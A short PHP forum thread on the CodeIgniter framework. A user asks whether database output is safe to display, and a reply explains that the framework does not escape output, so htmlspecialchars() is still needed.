Welcome Guest, Not a member yet? Register   Sign In
Display data securely which come from database
#1

For a query with
PHP Code:
$this->db->query($sql, array( $var )); 
 superglobals must be bind when using. But is it safe in CodeIgniter when I read data from the database and then display them? I usually do that with htmlspecialchars() , how do I handle it as now in Codeigniter?
Reply
#2

You should still use htmlspecialchars() and similar functions. CodeIgniter do not format, escape or filter the database output for you.

What it does, when using the Query Builder Class, is escaping you queries that insert/update data in the database.
Reply
#3

Thanks a lot!
Reply




Theme © iAndrew 2016 - Forum software by © MyBB